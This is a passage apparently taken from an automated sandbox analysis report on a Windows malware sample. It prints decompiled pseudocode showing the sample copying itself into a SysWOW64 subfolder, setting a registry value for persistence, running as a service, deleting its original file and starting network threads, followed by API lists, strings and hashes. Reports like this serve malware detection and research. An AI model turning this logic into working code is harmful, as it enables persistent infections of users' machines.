                                                                                                                                  						_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
                                                                                                                                  						_t467 = _t467 + 0x14;
                                                                                                                                  						_v16 = _t257;
                                                                                                                                  						if(_t257 == 0) {
                                                                                                                                  							E0040EF00("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v672);
                                                                                                                                  							_pop(_t438);
                                                                                                                                  							_a12 = GetCommandLineA();
                                                                                                                                  							_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
                                                                                                                                  							E0040EE2A(_t438, 0x4122f8, 0, 0x100);
                                                                                                                                  							_t468 = _t467 + 0x28;
                                                                                                                                  							__eflags = _v8;
                                                                                                                                  							if(_v8 == 0) {
                                                                                                                                  								L102:
                                                                                                                                  								_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
                                                                                                                                  								E0040EE2A(_t438, _t459, 0, _t454);
                                                                                                                                  								_t467 = _t468 + 0x28;
                                                                                                                                  								__eflags = _v8;
                                                                                                                                  								if(_v8 == 0) {
                                                                                                                                  									L110:
                                                                                                                                  									_t267 = E00406EC3();
                                                                                                                                  									__eflags = _t267;
                                                                                                                                  									if(_t267 != 0) {
                                                                                                                                  										E004098F2(_t438);
                                                                                                                                  										L19:
                                                                                                                                  										ExitProcess(0); // executed
                                                                                                                                  									}
                                                                                                                                  									__eflags = _v372;
                                                                                                                                  									if(_v372 == 0) {
                                                                                                                                  										L116:
                                                                                                                                  										 *0x4133b0 = 0;
                                                                                                                                  										L117:
                                                                                                                                  										_v64.hProcess =  &_v372;
                                                                                                                                  										_v64.hThread = E00409961;
                                                                                                                                  										_v64.dwProcessId = 0;
                                                                                                                                  										_v64.dwThreadId = 0;
                                                                                                                                  										StartServiceCtrlDispatcherA( &_v64); // executed
                                                                                                                                  										goto L19;
                                                                                                                                  									}
                                                                                                                                  									_t272 =  &_v372;
                                                                                                                                  									_t449 = _t272 + 1;
                                                                                                                                  									do {
                                                                                                                                  										_t438 =  *_t272;
                                                                                                                                  										_t272 = _t272 + 1;
                                                                                                                                  										__eflags = _t438;
                                                                                                                                  									} while (_t438 != 0);
                                                                                                                                  									__eflags = _t272 - _t449 - 0x20;
                                                                                                                                  									if(_t272 - _t449 >= 0x20) {
                                                                                                                                  										goto L116;
                                                                                                                                  									}
                                                                                                                                  									E0040EF00("ghrubsm",  &_v372);
                                                                                                                                  									_pop(_t438);
                                                                                                                                  									goto L117;
                                                                                                                                  								}
                                                                                                                                  								_t459 = _v8 + 3;
                                                                                                                                  								_t276 = E0040ED03(_t459, 0x20);
                                                                                                                                  								_pop(_t438);
                                                                                                                                  								__eflags = _t276;
                                                                                                                                  								if(_t276 != 0) {
                                                                                                                                  									L107:
                                                                                                                                  									_t454 = _t276 - _t459;
                                                                                                                                  									__eflags = _t454 - 0x20;
                                                                                                                                  									if(_t454 >= 0x20) {
                                                                                                                                  										_t454 = 0x1f;
                                                                                                                                  									}
                                                                                                                                  									E0040EE08(0x412184, _t459, _t454);
                                                                                                                                  									_t467 = _t467 + 0xc;
                                                                                                                                  									 *((char*)(_t454 + 0x412184)) = 0;
                                                                                                                                  									goto L110;
                                                                                                                                  								}
                                                                                                                                  								_t279 = _t459;
                                                                                                                                  								_t449 = _t279 + 1;
                                                                                                                                  								do {
                                                                                                                                  									_t438 =  *_t279;
                                                                                                                                  									_t279 = _t279 + 1;
                                                                                                                                  									__eflags = _t438;
                                                                                                                                  								} while (_t438 != 0);
                                                                                                                                  								_t276 = _t279 - _t449 + _t459;
                                                                                                                                  								__eflags = _t276;
                                                                                                                                  								goto L107;
                                                                                                                                  							}
                                                                                                                                  							_t282 = _v8 + 3;
                                                                                                                                  							_v672 = 0;
                                                                                                                                  							__eflags =  *_t282 - 0x22;
                                                                                                                                  							_v20 = _t282;
                                                                                                                                  							if( *_t282 != 0x22) {
                                                                                                                                  								_t283 = E0040ED03(_v20, 0x20);
                                                                                                                                  								_pop(_t438);
                                                                                                                                  								__eflags = _t283;
                                                                                                                                  								if(_t283 == 0) {
                                                                                                                                  									_t283 =  &(_a12[lstrlenA(_a12)]);
			__eflags = _t283;
		}
		_t284 = _t283 - _v8;
		_v24 = _t284;
		__eflags = _t284 + 0xfffffffd;
		E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
		 *((char*)(_t464 + _v24 - 0x29f)) = 0;
		L98:
		_t468 = _t468 + 0xc;
		L99:
		__eflags = _v672;
		if(_v672 != 0) {
			E0040EE08("C:\Users\hardz\Desktop\OcmKX57vR7.exe",  &_v672, 0x103);
			_t468 = _t468 + 0xc;
		}
		 *0x412cc0 = 1;
		goto L102;
	}
	_v20 = _v8 + 4;
	_t294 = E0040ED03(_v8 + 4, 0x22);
	_pop(_t438);
	__eflags = _t294;
	if(_t294 == 0) {
		goto L99;
	}
	_v24 = _t294 - _v8;
	E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
	 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
	goto L98;
}
_v36 = 0;
if(_t257 >= 4 || _v48 > 0x5e && _v44 != 0) {
	L84:
	if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
		_t303 =  &_v672;
		if(_v672 == 0x22) {
			_t303 =  &_v671;
		}
		if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
			_t303[3] = 0;
			_t304 = GetDriveTypeA(_t303);
			_t515 = _t304 - 2;
			if(_t304 != 2) {
				E00409145(_t515);
				_t438 = 1;
			}
		}
	}
	goto L19;
} else {
	E00404280(_t438, 1);
	_pop(_t438);
	if(_v672 == 0) {
		goto L84;
	}
	_t309 = E0040675C( &_v672,  &_v12, 0);
	_t467 = _t467 + 0xc;
	_v8 = _t309;
	if(_t309 == 0 || _v12 == 0) {
		goto L84;
	} else {
		_v32 = 0;
		_v28 = 0;
		if(_v16 == 2) {
			L55:
			__eflags = _v16 - 3;
			if(_v16 >= 3) {
				L83:
				E0040EC2E(_v8);
				_pop(_t438);
				if(_v36 != 0) {
					goto L19;
				}
				goto L84;
			}
			_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8);
			_t469 = _t467 + 0x14;
			__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
			if(__eflags == 0) {
				L82:
				E0040EE2A(_t438, _t459, 0, _t454);
				_t467 = _t469 + 0xc;
				goto L83;
			}
			_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
			_t469 = _t469 + 0x14;
			__eflags = _t318;
			if(_t318 == 0) {
				goto L82;
			}
			E0040EE2A(_t438, _t459, 0, _t454);
			_t470 = _t469 + 0xc;
			_v1272 = 0x22;
			lstrcpyA( &_v1271,  &_v672);
			_t324 = lstrlenA( &_v1272);
			 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
			_t325 = _t324 + 1;
			__eflags = _v16 - 2;
			_a12 = _t325;
			 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
			if(_v16 != 2) {
				L60:
				_push(0);
				_push( &_v112);
				_t328 = E00406DC2(_t438) ^ 0x5e5e5e5e;
				__eflags = _t328;
				_push(_t328);
				E0040F133();
				_t470 = _t470 + 0xc;
				L61:
				_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t471 = _t470 + 0x14;
				_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
				_v20 = _t332;
				__eflags = _t332;
				if(_t332 == 0) {
					_t373 =  &(_a12[1]);
					__eflags = _t373;
					_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
					RegCloseKey(_v24);
				}
				E0040EE2A(_t438, _t459, 0, _t454);
				E0040EE2A(_t438,  &_v772, 0, 0x44);
				_v772.cb = 0x44;
				E0040EE2A(_t438,  &_v64, 0, 0x10);
				_t469 = _t471 + 0x24;
				_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
				__eflags = _t340;
				if(_t340 != 0) {
					__eflags = _v372 - 0x22;
					_t357 =  &_v372;
					_v40 = _t357;
					if(_v372 == 0x22) {
						_t357 =  &_v371;
						_v40 = _t357;
					}
					__eflags =  *((char*)(_t357 + 1)) - 0x3a;
					if( *((char*)(_t357 + 1)) == 0x3a) {
						__eflags =  *((char*)(_t357 + 2)) - 0x5c;
						if( *((char*)(_t357 + 2)) == 0x5c) {
							_t358 = _v40;
							_t438 = _t358[3];
							_a15 = _t358[3];
							_t358[3] = 0;
							_t359 = GetDriveTypeA(_t358);
							__eflags = _t359 - 2;
							if(_t359 != 2) {
								_t438 = _v40;
								_v40[3] = _a15;
								lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8));
								E0040EE2A(_v40, _t459, 0, _t454);
								_t469 = _t469 + 0x20;
								__eflags = _v372 - 0x22;
								if(_v372 != 0x22) {
									lstrcatA( &_v1272, "\"");
								}
								lstrcatA( &_v1272,  &_v372);
								__eflags = _v372 - 0x22;
								if(_v372 != 0x22) {
									lstrcatA( &_v1272, "\"");
								}
								_v36 = 1;
							}
						}
					}
				}
				__eflags = _v32;
				if(_v32 != 0) {
					__eflags = _v28;
					if(_v28 != 0) {
						wsprintfA( &_v372, "%X%08X", _v28, _v32);
						lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
						E0040EE2A(_t438, _t459, 0, _t454);
						_t469 = _t469 + 0x30;
						lstrcatA( &_v1272,  &_v372);
					}
				}
				_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
				__eflags = _t344;
				if(_t344 == 0) {
					DeleteFileA( &_v672);
					_v36 = 0;
				}
				__eflags = _v16 - 1;
				if(_v16 == 1) {
					__eflags = _v20;
					if(_v20 == 0) {
						E004096FF(_t438);
					}
				}
				goto L82;
			}
			__eflags = _v112;
			if(_v112 != 0) {
				goto L61;
			}
			goto L60;
		}
		_t379 = GetTempPathA(0x1f4,  &_v1272);
		_t494 = _t379;
		if(_t379 == 0) {
			goto L55;
		}
		_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
		_t467 = _t467 + 0x14;
		if(_t383 == 0) {
			goto L55;
		}
		_v80 = 0;
		if(_v16 < 3 || _v372 == 0) {
			_push(0);
			_push( &_v80);
			_push(E00406DC2(_t438) ^ 0x5e5e5e5e);
			E0040F133();
			_t474 = _t467 + 0xc;
			lstrcpyA( &_v372, E00406CC9(_t438));
			lstrcatA( &_v372,  &_v80);
			lstrcatA( &_v372,  &E0041070C);
			_t396 = 0;
			__eflags = 0;
			goto L43;
		} else {
			_t410 =  &_v372;
			_t450 = _t410 + 1;
			do {
				_t441 =  *_t410;
				_t410 = _t410 + 1;
                                                                                                                                  									} while (_t441 != 0);
                                                                                                                                  									_t411 = _t410 - _t450;
                                                                                                                                  									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
                                                                                                                                  										_t411 = _t411 - 1;
                                                                                                                                  									}
                                                                                                                                  									_t451 = _t411;
                                                                                                                                  									if(_t411 <= 0) {
                                                                                                                                  										L41:
                                                                                                                                  										_t449 = _t451 - _t411;
                                                                                                                                  										_a12 = _t451 - _t411;
                                                                                                                                  										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
                                                                                                                                  										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
                                                                                                                                  										_t474 = _t467 + 0xc;
                                                                                                                                  										_t396 = 1;
                                                                                                                                  										L43:
                                                                                                                                  										if(_v44 == 0 || _v48 < 0x50) {
                                                                                                                                  											_t438 = 1;
                                                                                                                                  											__eflags = 1;
                                                                                                                                  										} else {
                                                                                                                                  											_t438 = 0;
                                                                                                                                  										}
                                                                                                                                  										_push(_t438);
                                                                                                                                  										_push(_t396);
                                                                                                                                  										_push( &_v372);
                                                                                                                                  										_push( &_v80);
                                                                                                                                  										_push( &_v672);
                                                                                                                                  										_push( &_v704);
                                                                                                                                  										_t401 = E00409326(_t438, _t449);
                                                                                                                                  										_t467 = _t474 + 0x18;
                                                                                                                                  										if(_t401 == 0) {
                                                                                                                                  											_t402 =  *0x41217c; // 0x0
                                                                                                                                  											_v32 = _t402;
                                                                                                                                  											_t403 =  *0x412180; // 0x0
                                                                                                                                  											goto L54;
                                                                                                                                  										} else {
                                                                                                                                  											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
                                                                                                                                  												_t403 = 0x5e0d0108;
                                                                                                                                  												 *0x412180 = 0x5e0d0108;
                                                                                                                                  												 *0x41217c = 0;
                                                                                                                                  												_v32 = 0;
                                                                                                                                  												L54:
                                                                                                                                  												_v28 = _t403;
                                                                                                                                  												DeleteFileA( &_v672);
                                                                                                                                  												goto L55;
                                                                                                                                  											}
                                                                                                                                  											_t459 = 1;
                                                                                                                                  											if(_v16 == 1) {
                                                                                                                                  												E004096FF(_t438);
                                                                                                                                  											}
                                                                                                                                  											_v36 = _t459;
                                                                                                                                  											goto L83;
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										_t442 =  &_v372;
                                                                                                                                  										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
                                                                                                                                  											_t411 = _t411 - 1;
                                                                                                                                  											if(_t411 > 0) {
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											goto L41;
                                                                                                                                  										}
                                                                                                                                  										goto L41;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t417 = _v8;
                                                                                                                                  					_t454 = _t417 + 3;
                                                                                                                                  					_v372 = 0;
                                                                                                                                  					if( *((char*)(_t417 + 3)) != 0x22) {
                                                                                                                                  						_t418 = E0040ED03(_t454, 0x20);
                                                                                                                                  						_pop(_t438);
                                                                                                                                  						__eflags = _t418;
                                                                                                                                  						if(_t418 == 0) {
                                                                                                                                  							_t418 =  &(_a12[lstrlenA(_a12)]);
                                                                                                                                  							__eflags = _t418;
                                                                                                                                  						}
                                                                                                                                  						_t459 = _t418 - _v8;
                                                                                                                                  						__eflags = _t459;
                                                                                                                                  						E0040EE08( &_v372, _t454, _t459 - 3);
                                                                                                                                  						 *((char*)(_t464 + _t459 - 0x173)) = 0;
                                                                                                                                  						L13:
                                                                                                                                  						_t467 = _t467 + 0xc;
                                                                                                                                  						L14:
                                                                                                                                  						if(_v372 != 0 && _v672 != 0) {
                                                                                                                                  							_t424 = E0040675C( &_v672,  &_v12, 0);
                                                                                                                                  							_t467 = _t467 + 0xc;
                                                                                                                                  							if(_t424 != 0 && _v12 != 0) {
                                                                                                                                  								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
                                                                                                                                  								_t467 = _t467 + 0xc;
                                                                                                                                  								_v12 = _t426;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L19;
                                                                                                                                  					}
                                                                                                                                  					_t454 = _t417 + 4;
                                                                                                                                  					_t428 = E0040ED03(_t417 + 4, 0x22);
                                                                                                                                  					_pop(_t438);
                                                                                                                                  					if(_t428 == 0) {
                                                                                                                                  						goto L14;
                                                                                                                                  					} else {
                                                                                                                                  						_t459 = _t428 - _v8;
                                                                                                                                  						E0040EE08( &_v372, _t454, _t459 - 4);
                                                                                                                                  						 *((char*)(_t464 + _t459 - 0x174)) = 0;
                                                                                                                                  						goto L13;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x0040a35a
                                                                                                                                  0x0040a35a
                                                                                                                                  0x0040a35f
                                                                                                                                  0x0040a361
                                                                                                                                  0x0040a3c2
                                                                                                                                  0x00409c05
                                                                                                                                  0x00409c06
                                                                                                                                  0x00409c06
                                                                                                                                  0x0040a363
                                                                                                                                  0x0040a369
                                                                                                                                  0x0040a397
                                                                                                                                  0x0040a397
                                                                                                                                  0x0040a39d
                                                                                                                                  0x0040a3a3
                                                                                                                                  0x0040a3aa
                                                                                                                                  0x0040a3b1
                                                                                                                                  0x0040a3b4
                                                                                                                                  0x0040a3b7
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a3b7
                                                                                                                                  0x0040a36b
                                                                                                                                  0x0040a371
                                                                                                                                  0x0040a374
                                                                                                                                  0x0040a374
                                                                                                                                  0x0040a376
                                                                                                                                  0x0040a377
                                                                                                                                  0x0040a377
                                                                                                                                  0x0040a37d
                                                                                                                                  0x0040a380
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a38e
                                                                                                                                  0x0040a394
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a394
                                                                                                                                  0x0040a318
                                                                                                                                  0x0040a31e
                                                                                                                                  0x0040a324
                                                                                                                                  0x0040a325
                                                                                                                                  0x0040a327
                                                                                                                                  0x0040a339
                                                                                                                                  0x0040a33b
                                                                                                                                  0x0040a33d
                                                                                                                                  0x0040a340
                                                                                                                                  0x0040a344
                                                                                                                                  0x0040a344
                                                                                                                                  0x0040a34c
                                                                                                                                  0x0040a351
                                                                                                                                  0x0040a354
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a354
                                                                                                                                  0x0040a329
                                                                                                                                  0x0040a32b
                                                                                                                                  0x0040a32e
                                                                                                                                  0x0040a32e
                                                                                                                                  0x0040a330
                                                                                                                                  0x0040a331
                                                                                                                                  0x0040a331
                                                                                                                                  0x0040a337
                                                                                                                                  0x0040a337
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a337
                                                                                                                                  0x0040a228
                                                                                                                                  0x0040a22b
                                                                                                                                  0x0040a231
                                                                                                                                  0x0040a234
                                                                                                                                  0x0040a237
                                                                                                                                  0x0040a27a
                                                                                                                                  0x0040a280
                                                                                                                                  0x0040a281
                                                                                                                                  0x0040a283
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a291
                                                                                                                                  0x0040a294
                                                                                                                                  0x0040a297
                                                                                                                                  0x0040a2a5
                                                                                                                                  0x0040a2ad
                                                                                                                                  0x0040a2b4
                                                                                                                                  0x0040a2b4
                                                                                                                                  0x0040a2b7
                                                                                                                                  0x0040a2b7
                                                                                                                                  0x0040a2bd
                                                                                                                                  0x0040a2d0
                                                                                                                                  0x0040a2d5
                                                                                                                                  0x0040a2d5
                                                                                                                                  0x0040a2d8
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a2d8
                                                                                                                                  0x0040a242
                                                                                                                                  0x0040a245
                                                                                                                                  0x0040a24b
                                                                                                                                  0x0040a24c
                                                                                                                                  0x0040a24e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a253
                                                                                                                                  0x0040a264
                                                                                                                                  0x0040a26c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a26c
                                                                                                                                  0x00409c39
                                                                                                                                  0x00409c3f
                                                                                                                                  0x0040a167
                                                                                                                                  0x0040a183
                                                                                                                                  0x0040a190
                                                                                                                                  0x0040a196
                                                                                                                                  0x0040a198
                                                                                                                                  0x0040a198
                                                                                                                                  0x0040a1a2
                                                                                                                                  0x0040a1b3
                                                                                                                                  0x0040a1b6
                                                                                                                                  0x0040a1bc
                                                                                                                                  0x0040a1bf
                                                                                                                                  0x0040a1c7
                                                                                                                                  0x0040a1cc
                                                                                                                                  0x0040a1cc
                                                                                                                                  0x0040a1bf
                                                                                                                                  0x0040a1a2
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c54
                                                                                                                                  0x00409c56
                                                                                                                                  0x00409c5b
                                                                                                                                  0x00409c62
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c74
                                                                                                                                  0x00409c79
                                                                                                                                  0x00409c7c
                                                                                                                                  0x00409c81
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c90
                                                                                                                                  0x00409c94
                                                                                                                                  0x00409c97
                                                                                                                                  0x00409c9a
                                                                                                                                  0x00409e3e
                                                                                                                                  0x00409e3e
                                                                                                                                  0x00409e42
                                                                                                                                  0x0040a155
                                                                                                                                  0x0040a158
                                                                                                                                  0x0040a15d
                                                                                                                                  0x0040a161
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a161
                                                                                                                                  0x00409e66
                                                                                                                                  0x00409e6b
                                                                                                                                  0x00409e75
                                                                                                                                  0x00409e77
                                                                                                                                  0x0040a14a
                                                                                                                                  0x0040a14d
                                                                                                                                  0x0040a152
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a152
                                                                                                                                  0x00409e98
                                                                                                                                  0x00409e9d
                                                                                                                                  0x00409ea0
                                                                                                                                  0x00409ea2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409eab
                                                                                                                                  0x00409eb0
                                                                                                                                  0x00409ec1
                                                                                                                                  0x00409ec8
                                                                                                                                  0x00409ed5
                                                                                                                                  0x00409edb
                                                                                                                                  0x00409ee3
                                                                                                                                  0x00409ee4
                                                                                                                                  0x00409ee8
                                                                                                                                  0x00409eeb
                                                                                                                                  0x00409ef2
                                                                                                                                  0x00409ef9
                                                                                                                                  0x00409efc
                                                                                                                                  0x00409efd
                                                                                                                                  0x00409f03
                                                                                                                                  0x00409f03
                                                                                                                                  0x00409f08
                                                                                                                                  0x00409f09
                                                                                                                                  0x00409f0e
                                                                                                                                  0x00409f11
                                                                                                                                  0x00409f2d
                                                                                                                                  0x00409f32
                                                                                                                                  0x00409f3b
                                                                                                                                  0x00409f41
                                                                                                                                  0x00409f44
                                                                                                                                  0x00409f46
                                                                                                                                  0x00409f4b
                                                                                                                                  0x00409f4b
                                                                                                                                  0x00409f67
                                                                                                                                  0x00409f6a
                                                                                                                                  0x00409f6a
                                                                                                                                  0x00409f73
                                                                                                                                  0x00409f82
                                                                                                                                  0x00409f8e
                                                                                                                                  0x00409f98
                                                                                                                                   [Control-flow graph for this function: the report renders the executed graph nodes as a column of instruction addresses. The nodes listed here span 0x00409b47 to 0x0040a145, with 0x00000000 entries where the graph shows no resolved address; the APIs called from these nodes are listed below.]

                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
                                                                                                                                  • SetErrorMode.KERNELBASE(00000003), ref: 00409A83
                                                                                                                                  • SetUnhandledExceptionFilter.KERNELBASE(00406511), ref: 00409A8A
                                                                                                                                    • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                                                                    • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                                                                    • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 00409AFD
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00409B99
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00409C06
                                                                                                                                  • GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00409D8B
                                                                                                                                  • lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
                                                                                                                                  • DeleteFileA.KERNEL32(00000022), ref: 00409E38
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
                                                                                                                                  • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
                                                                                                                                  • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
                                                                                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
                                                                                                                                  • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
                                                                                                                                  • wsprintfA.USER32 ref: 0040A0B6
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
                                                                                                                                  • lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
                                                                                                                                  • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
                                                                                                                                  • GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0040A1E5
                                                                                                                                    • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,004122F8,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                                                                    • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                                                                    • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040A288
                                                                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                                                                  • DeleteFileA.KERNEL32(C:\Users\user\Desktop\OcmKX57vR7.exe), ref: 0040A407
                                                                                                                                  • CreateThread.KERNEL32 ref: 0040A42C
                                                                                                                                  • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                                                                  • CreateThread.KERNEL32 ref: 0040A469
                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                                                                  • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                                                                  • String ID: "$"$"$%X%08X$0 v$C:\Users\user\Desktop\OcmKX57vR7.exe$C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$D$P$\$ghrubsm
                                                                                                                                  • API String ID: 2089075347-714065992
                                                                                                                                  • Opcode ID: 360b2b07d4ffeb50b92e0b027d8e20f7002dac9485d7fa8cd2f9e6a30bb22cad
                                                                                                                                  • Instruction ID: 03c383f258a4670438db1d87b8f5ad655fb57d32e75deaea02eb898f73f6b462
                                                                                                                                  • Opcode Fuzzy Hash: 360b2b07d4ffeb50b92e0b027d8e20f7002dac9485d7fa8cd2f9e6a30bb22cad
                                                                                                                                  • Instruction Fuzzy Hash: EC5291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _t15;
                                                                                                                                  				void* _t16;
                                                                                                                                  				void* _t18;
                                                                                                                                  				int _t20;
                                                                                                                                  				long _t26;
                                                                                                                                  				struct HINSTANCE__* _t32;
                                                                                                                                  				void* _t37;
                                                                                                                                  
                                                                                                                                  				if(_a8 != 0) {
